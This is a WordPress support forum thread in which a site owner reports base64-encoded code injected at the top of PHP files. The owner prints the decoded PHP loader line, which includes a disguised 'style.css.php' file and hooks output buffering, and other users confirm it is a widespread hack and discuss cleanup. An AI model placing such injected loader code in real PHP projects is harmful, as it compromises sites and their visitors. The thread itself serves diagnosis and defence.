Strange eval 64 code on top of php files

  • Resolved Nessdufrat

    (@nessdufrat)


    14 years, 11 months ago

    Hi!
    In my endless fight to get my visual editor working again, I noticed that almost all of my wp files have a string in base64 code at the top.
    By decoding it, I found out that it meant that :

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/44/d152788678/htdocs/wordpress/wp-content/upgrade/superedit/wp-super-edit/superedit/tinymce_plugins/advhr/css/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    What is it ? How come it appeared on my pages ? I doubt it’s a hack, I don’t see the point in hacking a website just to crash the visual editor and leave the database and the user rights alone…
    I checked in the database (I found a topic on this forum where base64 code would be added to the wp_options table), but no evil code here.

    I have already started to get rid of it on the main pages, but so far, it doesn’t solve anything. What is it ???

Viewing 10 replies - 1 through 10 (of 10 total)

  • If I’m correct, it is…in fact….a hack

    It’s a very common one that is infecting many many old WP installs

    You are going to have a lot of work ahead of you. Especially if you have other stuff on your hosting. Chances are, every php file on your server has been infected, not just that wp install.

    I’m working my way through the very same thing. Again….

    It doesn’t just affect your editor, that’s just a symptom

    I’m sure you’ve already seen this link
    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    but i’ll include it in case…..

    Thread Starter Nessdufrat

    (@nessdufrat)

    Yeah, I saw it… but thanks, actually, I’m glad I found out what it was, I was getting crazy with it.
    And you’re right, I checked on my host, all my files were affected… It will take hours to get rid of all that… ??

    yeah…there are soooo many files.

    I’ve been hit twice. Usually, I reinstall everything….it’s a pain

    But follow the advice in that link, or you’ll get hit again unfortunately.

    Good luck!

    Thread Starter Nessdufrat

    (@nessdufrat)

    The real pain in the ass was that I had planned to do a whole new WP install, and link all my websites to it, so that it could be easier to update. I had planned that for middle January, as well as the upgrade to WP 2.9. Now I’ll have to clean all my files, and go through the whole upgrade process in two weeks…

    Thread Starter Nessdufrat

    (@nessdufrat)

    After some research, the hack comes from a security failure in phpmyvisit, and affects all the php files on the server. Apparently, it only happened to people using 1&1 as host and having phpmyvisit installed…

    hmm…wonder if there was a similar issue at godaddy.

    After the last time I got hit, I cleaned up well, and secured my stuff. I had no problem for months,. Then it happened again. When it happened to me, several other people here had the same issue, all on godaddy servers.

    Can’t ever be truly safe on shared servers I guess…..

    Thread Starter Nessdufrat

    (@nessdufrat)

    Cleaning everything solved my problem. But I’ll update ASAP.

    This same thing happened to me, and I do have GoDaddy hosting. I’m done cleaning, but what a mess.

    Got same hack, and I’m at bluehost … that’s really a pain…

    …and me too, the location of the file had to do with tinymce… could tinymce be malicious ?

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Strange eval 64 code on top of php files’ is closed to new replies.